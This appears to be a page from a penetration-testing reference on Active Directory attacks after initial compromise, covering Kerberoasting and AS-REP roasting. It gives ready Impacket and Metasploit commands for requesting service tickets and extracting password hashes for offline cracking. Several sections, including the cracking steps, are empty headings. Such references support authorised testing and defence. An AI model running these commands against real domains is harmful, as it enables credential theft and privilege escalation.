search

Authenticated (Post-Compsomise) Attacks

hashtag
Kerberoasting

Why? Extract service account password hashes by requesting TGS tickets for accounts with SPNs, enabling offline password cracking.

Requirements: Valid domain user credentials (any domain user can perform Kerberoasting)

Attack value: Service accounts often have elevated privileges and/or weaker passwords, providing direct path to privilege escalation

hashtag
Discovery and Extraction

Impacket Method

# Discover and extract Kerberoastable accounts
# It is recommended to use single quote to avoid interpreting special charecters like '$'
python3 GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <DC-IP> -request -outputfile kerberoast.txt

# Output to the terminal
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP> -request

Metasploit Method

# Kerberoasting through Metasploit framework
use auxiliary/gather/kerberoast
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USERNAME <username>
set PASSWORD <password>
run

hashtag
Offline Cracking

hashtag
AS-REP Roasting

Why? Target accounts without Kerberos pre-authentication to obtain AS-REP hashes for offline cracking.

Requirements: Domain credentials OR username list for unauthenticated attempts

Attack Value: Targets accounts with legacy compatibility settings, often easier to crack than TGS hashes

hashtag
Discovery and Extraction

Impacket Method

CrackMapExec Method

hashtag
Offline Cracking

PreviousNon-Authenticated (External) AttacksNextRelay & Poisoning Attacks

Last updated

Was this helpful?